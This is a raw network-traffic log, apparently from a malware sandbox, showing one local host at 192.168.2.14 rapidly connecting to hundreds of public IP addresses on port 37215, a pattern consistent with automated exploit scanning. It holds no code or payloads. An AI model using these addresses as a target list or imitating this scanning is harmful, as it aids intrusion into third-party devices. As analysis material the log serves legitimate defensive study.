                                                                      Aug 2, 2024 13:16:58.215823889 CEST2402737215192.168.2.14102.193.156.117
                                                                      Aug 2, 2024 13:16:58.215853930 CEST2402737215192.168.2.14102.61.177.15
                                                                      Aug 2, 2024 13:16:58.215853930 CEST2402737215192.168.2.14197.63.43.188
                                                                      Aug 2, 2024 13:16:58.215853930 CEST2402737215192.168.2.14102.254.165.63
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.14197.41.181.215
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.14197.31.153.255
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.14156.116.227.160
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.14197.237.199.86
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.1441.77.33.7
                                                                      Aug 2, 2024 13:16:58.215862989 CEST2402737215192.168.2.14102.83.236.195
                                                                      Aug 2, 2024 13:16:58.215877056 CEST2402737215192.168.2.14156.121.25.63
                                                                      Aug 2, 2024 13:16:58.215882063 CEST2402737215192.168.2.14156.159.4.121
                                                                      Aug 2, 2024 13:16:58.215882063 CEST2402737215192.168.2.14102.193.19.190
                                                                      Aug 2, 2024 13:16:58.215898037 CEST2402737215192.168.2.1441.66.249.66
                                                                      Aug 2, 2024 13:16:58.215919018 CEST2402737215192.168.2.14197.143.110.153
                                                                      Aug 2, 2024 13:16:58.215919018 CEST2402737215192.168.2.14197.108.141.255
                                                                      Aug 2, 2024 13:16:58.215919018 CEST2402737215192.168.2.14197.96.90.220
                                                                      Aug 2, 2024 13:16:58.215929031 CEST2402737215192.168.2.14102.201.58.88
                                                                      Aug 2, 2024 13:16:58.215929031 CEST2402737215192.168.2.14102.126.8.45
                                                                      Aug 2, 2024 13:16:58.215934038 CEST2402737215192.168.2.14197.86.186.139
                                                                      Aug 2, 2024 13:16:58.215934038 CEST2402737215192.168.2.14197.141.178.1
                                                                      Aug 2, 2024 13:16:58.215991020 CEST2402737215192.168.2.14156.223.63.99
                                                                      Aug 2, 2024 13:16:58.216012001 CEST2402737215192.168.2.14156.52.175.146
                                                                      Aug 2, 2024 13:16:58.216058969 CEST2402737215192.168.2.14197.189.213.87
                                                                      Aug 2, 2024 13:16:58.216059923 CEST2402737215192.168.2.1441.196.168.28
                                                                      Aug 2, 2024 13:16:58.216061115 CEST2402737215192.168.2.14156.27.201.180
                                                                      Aug 2, 2024 13:16:58.216061115 CEST2402737215192.168.2.14156.52.82.231
                                                                      Aug 2, 2024 13:16:58.216063023 CEST2402737215192.168.2.1441.199.113.235
                                                                      Aug 2, 2024 13:16:58.216067076 CEST2402737215192.168.2.14156.83.137.189
                                                                      Aug 2, 2024 13:16:58.216070890 CEST2402737215192.168.2.14197.18.214.172
                                                                      Aug 2, 2024 13:16:58.216100931 CEST2402737215192.168.2.14102.66.248.249
                                                                      Aug 2, 2024 13:16:58.216101885 CEST2402737215192.168.2.1441.198.32.60
                                                                      Aug 2, 2024 13:16:58.216125011 CEST2402737215192.168.2.14197.171.7.43
                                                                      Aug 2, 2024 13:16:58.216133118 CEST2402737215192.168.2.14102.233.216.112
                                                                      Aug 2, 2024 13:16:58.216151953 CEST2402737215192.168.2.14102.26.47.202
                                                                      Aug 2, 2024 13:16:58.216181040 CEST2402737215192.168.2.14156.251.172.56
                                                                      Aug 2, 2024 13:16:58.216202974 CEST2402737215192.168.2.14102.33.122.74
                                                                      Aug 2, 2024 13:16:58.216202974 CEST2402737215192.168.2.14102.243.78.164
                                                                      Aug 2, 2024 13:16:58.216214895 CEST2402737215192.168.2.1441.92.242.247
                                                                      Aug 2, 2024 13:16:58.216269970 CEST2402737215192.168.2.14102.18.249.68
                                                                      Aug 2, 2024 13:16:58.216324091 CEST2402737215192.168.2.14197.224.38.141
                                                                      Aug 2, 2024 13:16:58.216324091 CEST2402737215192.168.2.14156.62.102.223
                                                                      Aug 2, 2024 13:16:58.216324091 CEST2402737215192.168.2.1441.89.9.170
                                                                      Aug 2, 2024 13:16:58.216326952 CEST2402737215192.168.2.1441.214.206.175
                                                                      Aug 2, 2024 13:16:58.216362000 CEST2402737215192.168.2.14197.108.60.230
                                                                      Aug 2, 2024 13:16:58.216362000 CEST2402737215192.168.2.14156.251.7.52
                                                                      Aug 2, 2024 13:16:58.216362000 CEST2402737215192.168.2.1441.71.218.215
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14102.236.166.183
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14102.85.40.224
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14156.208.168.130
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.1441.182.160.99
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14156.58.128.130
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14197.228.242.161
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14197.71.106.185
                                                                      Aug 2, 2024 13:16:58.216368914 CEST2402737215192.168.2.14197.70.150.139
                                                                      Aug 2, 2024 13:16:58.216379881 CEST2402737215192.168.2.14156.21.244.38
                                                                      Aug 2, 2024 13:16:58.216379881 CEST2402737215192.168.2.14197.170.81.2
                                                                      Aug 2, 2024 13:16:58.216379881 CEST2402737215192.168.2.14197.1.212.213
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14102.216.0.15
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14102.87.141.197
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14156.231.217.121
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14197.86.20.149
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14156.81.161.238
                                                                      Aug 2, 2024 13:16:58.216454029 CEST2402737215192.168.2.14102.85.98.68
                                                                      Aug 2, 2024 13:16:58.216454983 CEST2402737215192.168.2.14156.1.102.186
                                                                      Aug 2, 2024 13:16:58.216454983 CEST2402737215192.168.2.14197.56.31.208
                                                                      Aug 2, 2024 13:16:58.216455936 CEST2402737215192.168.2.14102.49.127.128
                                                                      Aug 2, 2024 13:16:58.216455936 CEST2402737215192.168.2.14197.65.49.82
                                                                      Aug 2, 2024 13:16:58.216455936 CEST2402737215192.168.2.1441.8.150.247
                                                                      Aug 2, 2024 13:16:58.216456890 CEST2402737215192.168.2.1441.78.186.44
                                                                      Aug 2, 2024 13:16:58.216456890 CEST2402737215192.168.2.14197.184.234.92
                                                                      Aug 2, 2024 13:16:58.216459036 CEST2402737215192.168.2.14197.187.2.40
                                                                      Aug 2, 2024 13:16:58.216458082 CEST2402737215192.168.2.14197.164.224.44
                                                                      Aug 2, 2024 13:16:58.216458082 CEST2402737215192.168.2.14156.17.112.97
                                                                      Aug 2, 2024 13:16:58.216458082 CEST2402737215192.168.2.14156.220.46.166
                                                                      Aug 2, 2024 13:16:58.216458082 CEST2402737215192.168.2.1441.248.71.93
                                                                      Aug 2, 2024 13:16:58.216458082 CEST2402737215192.168.2.1441.159.12.111
                                                                      Aug 2, 2024 13:16:58.216491938 CEST2402737215192.168.2.14102.236.125.3
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.14156.247.41.118
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.14156.30.221.242
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.14102.150.45.89
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.14197.150.174.48
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.1441.179.3.179
                                                                      Aug 2, 2024 13:16:58.216494083 CEST2402737215192.168.2.14197.53.111.93
                                                                      Aug 2, 2024 13:16:58.216516972 CEST2402737215192.168.2.14102.200.145.179
                                                                      Aug 2, 2024 13:16:58.216532946 CEST2402737215192.168.2.14102.175.12.7
                                                                      Aug 2, 2024 13:16:58.216532946 CEST2402737215192.168.2.1441.183.125.15
                                                                      Aug 2, 2024 13:16:58.216532946 CEST2402737215192.168.2.14102.143.39.251
                                                                      Aug 2, 2024 13:16:58.216557980 CEST2402737215192.168.2.1441.193.56.91
                                                                      Aug 2, 2024 13:16:58.216557980 CEST2402737215192.168.2.14156.95.229.51
                                                                      Aug 2, 2024 13:16:58.216557980 CEST2402737215192.168.2.1441.223.209.165
                                                                      Aug 2, 2024 13:16:58.216557980 CEST2402737215192.168.2.14102.110.185.163
                                                                      Aug 2, 2024 13:16:58.216564894 CEST2402737215192.168.2.1441.218.121.126
                                                                      Aug 2, 2024 13:16:58.216578007 CEST2402737215192.168.2.14156.95.210.241
                                                                      Aug 2, 2024 13:16:58.216578960 CEST2402737215192.168.2.14102.112.17.185
                                                                      Aug 2, 2024 13:16:58.216578960 CEST2402737215192.168.2.1441.84.152.45
                                                                      Aug 2, 2024 13:16:58.216578960 CEST2402737215192.168.2.14156.255.31.67
                                                                      Aug 2, 2024 13:16:58.216583014 CEST2402737215192.168.2.14197.45.40.231
                                                                      Aug 2, 2024 13:16:58.216588974 CEST2402737215192.168.2.14156.147.127.32
                                                                      Aug 2, 2024 13:16:58.216624975 CEST2402737215192.168.2.1441.124.47.214
                                                                      Aug 2, 2024 13:16:58.216624975 CEST2402737215192.168.2.14102.11.249.225
                                                                      Aug 2, 2024 13:16:58.216624975 CEST2402737215192.168.2.14197.253.199.135
                                                                      Aug 2, 2024 13:16:58.216624975 CEST2402737215192.168.2.14197.217.49.101
                                                                      Aug 2, 2024 13:16:58.216630936 CEST2402737215192.168.2.1441.129.47.69
                                                                      Aug 2, 2024 13:16:58.216630936 CEST2402737215192.168.2.14197.72.232.70
                                                                      Aug 2, 2024 13:16:58.216631889 CEST2402737215192.168.2.14156.237.35.31
                                                                      Aug 2, 2024 13:16:58.216631889 CEST2402737215192.168.2.14197.21.56.11
                                                                      Aug 2, 2024 13:16:58.216631889 CEST2402737215192.168.2.14156.244.173.94
                                                                      Aug 2, 2024 13:16:58.216631889 CEST2402737215192.168.2.14156.44.69.51
                                                                      Aug 2, 2024 13:16:58.216631889 CEST2402737215192.168.2.14156.179.155.219
                                                                      Aug 2, 2024 13:16:58.216660023 CEST2402737215192.168.2.14102.158.172.116
                                                                      Aug 2, 2024 13:16:58.216670990 CEST2402737215192.168.2.14197.198.98.225
                                                                      Aug 2, 2024 13:16:58.216670990 CEST2402737215192.168.2.1441.141.4.215
                                                                      Aug 2, 2024 13:16:58.216670990 CEST2402737215192.168.2.14197.222.25.147
                                                                      Aug 2, 2024 13:16:58.216670990 CEST2402737215192.168.2.14102.65.134.37
                                                                      Aug 2, 2024 13:16:58.216670990 CEST2402737215192.168.2.14197.132.194.230
                                                                      Aug 2, 2024 13:16:58.216674089 CEST2402737215192.168.2.14197.181.85.218
                                                                      Aug 2, 2024 13:16:58.216674089 CEST2402737215192.168.2.14156.42.233.57
                                                                      Aug 2, 2024 13:16:58.216674089 CEST2402737215192.168.2.14156.217.34.129
                                                                      Aug 2, 2024 13:16:58.216674089 CEST2402737215192.168.2.1441.204.88.248
                                                                      Aug 2, 2024 13:16:58.216674089 CEST2402737215192.168.2.1441.229.20.88
                                                                      Aug 2, 2024 13:16:58.216681004 CEST2402737215192.168.2.14156.95.30.7
                                                                      Aug 2, 2024 13:16:58.216681004 CEST2402737215192.168.2.14102.233.141.107
                                                                      Aug 2, 2024 13:16:58.216681004 CEST2402737215192.168.2.1441.97.171.30
                                                                      Aug 2, 2024 13:16:58.216686964 CEST2402737215192.168.2.14102.22.105.192
                                                                      Aug 2, 2024 13:16:58.216686964 CEST2402737215192.168.2.1441.115.31.188
                                                                      Aug 2, 2024 13:16:58.216687918 CEST2402737215192.168.2.14197.22.195.119
                                                                      Aug 2, 2024 13:16:58.216687918 CEST2402737215192.168.2.14102.124.50.116
                                                                      Aug 2, 2024 13:16:58.216721058 CEST2402737215192.168.2.14102.221.88.185
                                                                      Aug 2, 2024 13:16:58.216732025 CEST2402737215192.168.2.14102.53.23.155
                                                                      Aug 2, 2024 13:16:58.216746092 CEST2402737215192.168.2.14156.154.195.134
                                                                      Aug 2, 2024 13:16:58.216746092 CEST2402737215192.168.2.14197.178.199.202
                                                                      Aug 2, 2024 13:16:58.216753960 CEST2402737215192.168.2.14102.58.14.84
                                                                      Aug 2, 2024 13:16:58.216753960 CEST2402737215192.168.2.1441.239.249.161
                                                                      Aug 2, 2024 13:16:58.216753960 CEST2402737215192.168.2.1441.80.221.198
                                                                      Aug 2, 2024 13:16:58.216780901 CEST2402737215192.168.2.14197.94.79.44
                                                                      Aug 2, 2024 13:16:58.216780901 CEST2402737215192.168.2.1441.233.80.70
                                                                      Aug 2, 2024 13:16:58.216780901 CEST2402737215192.168.2.14197.252.137.155
                                                                      Aug 2, 2024 13:16:58.216789007 CEST2402737215192.168.2.14197.150.162.151
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14197.208.50.124
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14102.210.80.247
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.1441.4.156.100
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14197.224.40.46
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.1441.45.47.152
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14156.244.5.169
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14102.100.207.121
                                                                      Aug 2, 2024 13:16:58.216794968 CEST2402737215192.168.2.14197.238.250.73
                                                                      Aug 2, 2024 13:16:58.216797113 CEST2402737215192.168.2.14197.184.82.67
                                                                      Aug 2, 2024 13:16:58.216797113 CEST2402737215192.168.2.14197.123.99.131
                                                                      Aug 2, 2024 13:16:58.216842890 CEST2402737215192.168.2.1441.126.52.221
                                                                      Aug 2, 2024 13:16:58.216842890 CEST2402737215192.168.2.1441.89.189.19
                                                                      Aug 2, 2024 13:16:58.216842890 CEST2402737215192.168.2.14197.200.111.92
                                                                      Aug 2, 2024 13:16:58.216842890 CEST2402737215192.168.2.14156.214.251.113
                                                                      Aug 2, 2024 13:16:58.216845036 CEST2402737215192.168.2.14102.101.228.205
                                                                      Aug 2, 2024 13:16:58.216845036 CEST2402737215192.168.2.14102.40.180.155
                                                                      Aug 2, 2024 13:16:58.216845036 CEST2402737215192.168.2.14197.191.127.178
                                                                      Aug 2, 2024 13:16:58.216845036 CEST2402737215192.168.2.14102.246.185.82
                                                                      Aug 2, 2024 13:16:58.216849089 CEST2402737215192.168.2.14156.126.144.64
                                                                      Aug 2, 2024 13:16:58.216849089 CEST2402737215192.168.2.1441.237.127.172
                                                                      Aug 2, 2024 13:16:58.216849089 CEST2402737215192.168.2.14102.53.244.89
                                                                      Aug 2, 2024 13:16:58.216859102 CEST2402737215192.168.2.14102.149.66.220
                                                                      Aug 2, 2024 13:16:58.216869116 CEST2402737215192.168.2.14102.133.206.37
                                                                      Aug 2, 2024 13:16:58.216869116 CEST2402737215192.168.2.14102.3.70.60
                                                                      Aug 2, 2024 13:16:58.216869116 CEST2402737215192.168.2.1441.76.245.104
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14156.210.67.56
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14156.226.179.24
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14197.5.119.110
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14102.227.220.63
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14102.236.7.228
                                                                      Aug 2, 2024 13:16:58.216881990 CEST2402737215192.168.2.14102.80.63.10
                                                                      Aug 2, 2024 13:16:58.216891050 CEST2402737215192.168.2.14197.172.30.104
                                                                      Aug 2, 2024 13:16:58.216891050 CEST2402737215192.168.2.14102.64.173.85
                                                                      Aug 2, 2024 13:16:58.216891050 CEST2402737215192.168.2.14197.115.12.25
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.14156.117.4.255
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.14156.189.137.83
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.14197.189.166.201
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.1441.153.150.254
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.14156.70.215.140
                                                                      Aug 2, 2024 13:16:58.216927052 CEST2402737215192.168.2.14156.129.111.78
                                                                      Aug 2, 2024 13:16:58.216928959 CEST2402737215192.168.2.14102.244.103.13
                                                                      Aug 2, 2024 13:16:58.216928959 CEST2402737215192.168.2.14197.198.105.44
                                                                      Aug 2, 2024 13:16:58.216928959 CEST2402737215192.168.2.14156.215.173.17
                                                                      Aug 2, 2024 13:16:58.216928959 CEST2402737215192.168.2.14102.27.184.205
                                                                      Aug 2, 2024 13:16:58.216939926 CEST2402737215192.168.2.14102.67.203.195
                                                                      Aug 2, 2024 13:16:58.216939926 CEST2402737215192.168.2.1441.140.84.80
                                                                      Aug 2, 2024 13:16:58.216947079 CEST2402737215192.168.2.14102.193.208.39
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.14197.137.204.218
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.14197.219.170.141
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.14156.98.7.198
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.14197.7.9.123
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.14197.72.15.232
                                                                      Aug 2, 2024 13:16:58.216996908 CEST2402737215192.168.2.1441.183.87.24
                                                                      Aug 2, 2024 13:16:58.217004061 CEST2402737215192.168.2.14102.122.38.41
                                                                      Aug 2, 2024 13:16:58.217003107 CEST2402737215192.168.2.14156.60.176.234
                                                                      Aug 2, 2024 13:16:58.217004061 CEST2402737215192.168.2.14197.241.26.8
                                                                      Aug 2, 2024 13:16:58.217003107 CEST2402737215192.168.2.14102.39.136.2
                                                                      Aug 2, 2024 13:16:58.217005014 CEST2402737215192.168.2.14102.221.2.93
                                                                      Aug 2, 2024 13:16:58.217003107 CEST2402737215192.168.2.14156.175.108.249
                                                                      Aug 2, 2024 13:16:58.217006922 CEST2402737215192.168.2.14102.37.55.114
                                                                      Aug 2, 2024 13:16:58.217003107 CEST2402737215192.168.2.1441.84.142.241
                                                                      Aug 2, 2024 13:16:58.217005968 CEST2402737215192.168.2.14102.29.176.218
                                                                      Aug 2, 2024 13:16:58.217015982 CEST2402737215192.168.2.14156.225.150.201
                                                                      Aug 2, 2024 13:16:58.217015982 CEST2402737215192.168.2.14197.123.6.248
                                                                      Aug 2, 2024 13:16:58.217036009 CEST2402737215192.168.2.1441.242.243.22
                                                                      Aug 2, 2024 13:16:58.217036009 CEST2402737215192.168.2.14102.185.219.243
                                                                      Aug 2, 2024 13:16:58.217061043 CEST2402737215192.168.2.14102.35.205.49
                                                                      Aug 2, 2024 13:16:58.217061043 CEST2402737215192.168.2.14156.217.6.8
                                                                      Aug 2, 2024 13:16:58.217062950 CEST2402737215192.168.2.14102.204.202.64
                                                                      Aug 2, 2024 13:16:58.217062950 CEST2402737215192.168.2.14102.56.84.71
                                                                      Aug 2, 2024 13:16:58.217062950 CEST2402737215192.168.2.14102.6.161.143
                                                                      Aug 2, 2024 13:16:58.217065096 CEST2402737215192.168.2.1441.124.101.233
                                                                      Aug 2, 2024 13:16:58.217067003 CEST2402737215192.168.2.14156.252.136.245
                                                                      Aug 2, 2024 13:16:58.217071056 CEST2402737215192.168.2.1441.169.68.127
                                                                      Aug 2, 2024 13:16:58.217092037 CEST2402737215192.168.2.1441.173.235.134
                                                                      Aug 2, 2024 13:16:58.217092037 CEST2402737215192.168.2.14197.253.84.110
                                                                      Aug 2, 2024 13:16:58.217092037 CEST2402737215192.168.2.14197.39.51.47
                                                                      Aug 2, 2024 13:16:58.217092037 CEST2402737215192.168.2.14197.70.108.65
                                                                      Aug 2, 2024 13:16:58.217092037 CEST2402737215192.168.2.14197.179.141.151
                                                                      Aug 2, 2024 13:16:58.217103004 CEST2402737215192.168.2.14197.23.252.12
                                                                      Aug 2, 2024 13:16:58.217103004 CEST2402737215192.168.2.14197.64.91.121
                                                                      Aug 2, 2024 13:16:58.217103004 CEST2402737215192.168.2.14197.171.145.200
                                                                      Aug 2, 2024 13:16:58.217103004 CEST2402737215192.168.2.14197.112.20.113
                                                                      Aug 2, 2024 13:16:58.217108965 CEST2402737215192.168.2.14102.4.225.228
                                                                      Aug 2, 2024 13:16:58.217108965 CEST2402737215192.168.2.14156.86.47.156
                                                                      Aug 2, 2024 13:16:58.217108965 CEST2402737215192.168.2.14156.39.73.169
                                                                      Aug 2, 2024 13:16:58.217132092 CEST2402737215192.168.2.14102.175.192.153
                                                                      Aug 2, 2024 13:16:58.217132092 CEST2402737215192.168.2.1441.71.164.151
                                                                      Aug 2, 2024 13:16:58.217132092 CEST2402737215192.168.2.14102.75.4.71
                                                                      Aug 2, 2024 13:16:58.217132092 CEST2402737215192.168.2.14156.244.21.38
                                                                      Aug 2, 2024 13:16:58.217149973 CEST2402737215192.168.2.14156.108.41.18
                                                                      Aug 2, 2024 13:16:58.217150927 CEST2402737215192.168.2.14102.170.29.14
                                                                      Aug 2, 2024 13:16:58.217150927 CEST2402737215192.168.2.14156.227.14.84
                                                                      Aug 2, 2024 13:16:58.217150927 CEST2402737215192.168.2.14102.6.247.118
                                                                      Aug 2, 2024 13:16:58.217150927 CEST2402737215192.168.2.14102.88.119.12
                                                                      Aug 2, 2024 13:16:58.217150927 CEST2402737215192.168.2.14156.107.145.200
                                                                      Aug 2, 2024 13:16:58.217154980 CEST2402737215192.168.2.14197.145.130.135
                                                                      Aug 2, 2024 13:16:58.217154980 CEST2402737215192.168.2.14156.155.28.211
                                                                      Aug 2, 2024 13:16:58.217155933 CEST2402737215192.168.2.14156.185.171.50
                                                                      Aug 2, 2024 13:16:58.217155933 CEST2402737215192.168.2.14102.127.150.237
                                                                      Aug 2, 2024 13:16:58.217160940 CEST2402737215192.168.2.14102.132.20.187
                                                                      Aug 2, 2024 13:16:58.217160940 CEST2402737215192.168.2.14102.62.33.1
                                                                      Aug 2, 2024 13:16:58.217160940 CEST2402737215192.168.2.1441.154.81.100
                                                                      Aug 2, 2024 13:16:58.217164993 CEST2402737215192.168.2.1441.136.241.6
                                                                      Aug 2, 2024 13:16:58.217164993 CEST2402737215192.168.2.14102.64.255.35
                                                                      Aug 2, 2024 13:16:58.217164993 CEST2402737215192.168.2.14197.164.88.127
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.14156.159.248.75
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.14197.237.86.103
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.1441.106.147.79
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.14102.205.55.255
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.1441.115.121.70
                                                                      Aug 2, 2024 13:16:58.217216015 CEST2402737215192.168.2.14156.31.62.119
                                                                      Aug 2, 2024 13:16:58.217219114 CEST2402737215192.168.2.14102.130.92.83
                                                                      Aug 2, 2024 13:16:58.217219114 CEST2402737215192.168.2.14197.91.100.145
                                                                      Aug 2, 2024 13:16:58.217226982 CEST2402737215192.168.2.1441.10.221.54
                                                                      Aug 2, 2024 13:16:58.217226982 CEST2402737215192.168.2.14102.124.160.33
                                                                      Aug 2, 2024 13:16:58.217226982 CEST2402737215192.168.2.14102.220.147.112
                                                                      Aug 2, 2024 13:16:58.217226982 CEST2402737215192.168.2.1441.104.47.156
                                                                      Aug 2, 2024 13:16:58.217227936 CEST2402737215192.168.2.14156.240.72.84
                                                                      Aug 2, 2024 13:16:58.217227936 CEST2402737215192.168.2.14156.182.188.12
                                                                      Aug 2, 2024 13:16:58.217228889 CEST2402737215192.168.2.14156.58.13.240
                                                                      Aug 2, 2024 13:16:58.217228889 CEST2402737215192.168.2.14197.96.156.167
                                                                      Aug 2, 2024 13:16:58.217231035 CEST2402737215192.168.2.14197.60.255.184
                                                                      Aug 2, 2024 13:16:58.217231035 CEST2402737215192.168.2.14156.207.104.1
                                                                      Aug 2, 2024 13:16:58.217231989 CEST2402737215192.168.2.14102.84.223.48
                                                                      Aug 2, 2024 13:16:58.217231035 CEST2402737215192.168.2.14197.157.224.129
                                                                      Aug 2, 2024 13:16:58.217231035 CEST2402737215192.168.2.1441.58.79.95
                                                                      Aug 2, 2024 13:16:58.217231989 CEST2402737215192.168.2.14102.124.116.206
                                                                      Aug 2, 2024 13:16:58.217231989 CEST2402737215192.168.2.1441.105.207.167
                                                                      Aug 2, 2024 13:16:58.217292070 CEST2402737215192.168.2.14156.5.95.39
                                                                      Aug 2, 2024 13:16:58.217292070 CEST2402737215192.168.2.14197.38.44.101
                                                                      Aug 2, 2024 13:16:58.217314959 CEST2402737215192.168.2.14197.223.246.166
                                                                      Aug 2, 2024 13:16:58.217351913 CEST2402737215192.168.2.14197.185.237.152
                                                                      Aug 2, 2024 13:16:58.217354059 CEST2402737215192.168.2.14197.237.178.242
                                                                      Aug 2, 2024 13:16:58.217370987 CEST2402737215192.168.2.1441.240.211.242
                                                                      Aug 2, 2024 13:16:58.217370987 CEST2402737215192.168.2.14102.71.204.204
                                                                      Aug 2, 2024 13:16:58.217377901 CEST2402737215192.168.2.14102.145.42.99
                                                                      Aug 2, 2024 13:16:58.217402935 CEST2402737215192.168.2.1441.60.24.13
                                                                      Aug 2, 2024 13:16:58.217405081 CEST2402737215192.168.2.14197.249.74.120
                                                                      Aug 2, 2024 13:16:58.217406988 CEST2402737215192.168.2.14156.167.53.48
                                                                      Aug 2, 2024 13:16:58.217430115 CEST2402737215192.168.2.14156.246.97.163
                                                                      Aug 2, 2024 13:16:58.217444897 CEST2402737215192.168.2.14156.12.93.136
                                                                      Aug 2, 2024 13:16:58.217446089 CEST2402737215192.168.2.14156.125.96.36
                                                                      Aug 2, 2024 13:16:58.217463970 CEST2402737215192.168.2.14102.144.119.230
                                                                      Aug 2, 2024 13:16:58.217473030 CEST2402737215192.168.2.1441.147.72.81
                                                                      Aug 2, 2024 13:16:58.217473030 CEST2402737215192.168.2.1441.52.94.22
                                                                      Aug 2, 2024 13:16:58.217480898 CEST2402737215192.168.2.14156.133.150.155
                                                                      Aug 2, 2024 13:16:58.217489958 CEST2402737215192.168.2.1441.76.59.226
                                                                      Aug 2, 2024 13:16:58.217498064 CEST2402737215192.168.2.14156.190.254.95
                                                                      Aug 2, 2024 13:16:58.217498064 CEST2402737215192.168.2.1441.4.208.36
                                                                      Aug 2, 2024 13:16:58.217498064 CEST2402737215192.168.2.14102.12.11.111
                                                                      Aug 2, 2024 13:16:58.217498064 CEST2402737215192.168.2.14102.30.145.88
                                                                      Aug 2, 2024 13:16:58.217498064 CEST2402737215192.168.2.14156.36.137.101
                                                                      Aug 2, 2024 13:16:58.217509031 CEST2402737215192.168.2.1441.46.30.143
                                                                      Aug 2, 2024 13:16:58.217542887 CEST2402737215192.168.2.14102.93.144.38
                                                                      Aug 2, 2024 13:16:58.217542887 CEST2402737215192.168.2.14197.102.103.190
                                                                      Aug 2, 2024 13:16:58.217542887 CEST2402737215192.168.2.14197.129.7.123
                                                                      Aug 2, 2024 13:16:58.217542887 CEST2402737215192.168.2.14102.122.67.104
                                                                      Aug 2, 2024 13:16:58.217550039 CEST2402737215192.168.2.14102.236.87.193
                                                                      Aug 2, 2024 13:16:58.217551947 CEST2402737215192.168.2.1441.169.57.39
                                                                      Aug 2, 2024 13:16:58.217591047 CEST2402737215192.168.2.1441.214.104.215
                                                                      Aug 2, 2024 13:16:58.217609882 CEST2402737215192.168.2.1441.62.13.161
                                                                      Aug 2, 2024 13:16:58.217609882 CEST2402737215192.168.2.14102.79.235.40
                                                                      Aug 2, 2024 13:16:58.217609882 CEST2402737215192.168.2.14197.23.175.250
                                                                      Aug 2, 2024 13:16:58.217609882 CEST2402737215192.168.2.14197.206.44.128
                                                                      Aug 2, 2024 13:16:58.217617989 CEST2402737215192.168.2.1441.148.92.108
                                                                      Aug 2, 2024 13:16:58.217617989 CEST2402737215192.168.2.14197.206.158.84
                                                                      Aug 2, 2024 13:16:58.217617989 CEST2402737215192.168.2.14197.242.106.56
                                                                      Aug 2, 2024 13:16:58.217653036 CEST2402737215192.168.2.14102.230.156.124
                                                                      Aug 2, 2024 13:16:58.217708111 CEST2402737215192.168.2.14156.60.206.73
                                                                      Aug 2, 2024 13:16:58.217741013 CEST2402737215192.168.2.14102.232.174.80
                                                                      Aug 2, 2024 13:16:58.217741013 CEST2402737215192.168.2.1441.167.39.165
                                                                      Aug 2, 2024 13:16:58.217741013 CEST2402737215192.168.2.14102.91.47.162
                                                                      Aug 2, 2024 13:16:58.217742920 CEST2402737215192.168.2.14197.92.5.106
                                                                      Aug 2, 2024 13:16:58.217742920 CEST2402737215192.168.2.1441.6.60.157
                                                                      Aug 2, 2024 13:16:58.217742920 CEST2402737215192.168.2.1441.97.190.15
                                                                      Aug 2, 2024 13:16:58.217744112 CEST2402737215192.168.2.14197.109.218.109
                                                                      Aug 2, 2024 13:16:58.217746019 CEST2402737215192.168.2.14156.136.40.24
                                                                      Aug 2, 2024 13:16:58.217744112 CEST2402737215192.168.2.14102.16.186.51
                                                                      Aug 2, 2024 13:16:58.217744112 CEST2402737215192.168.2.14156.206.213.129
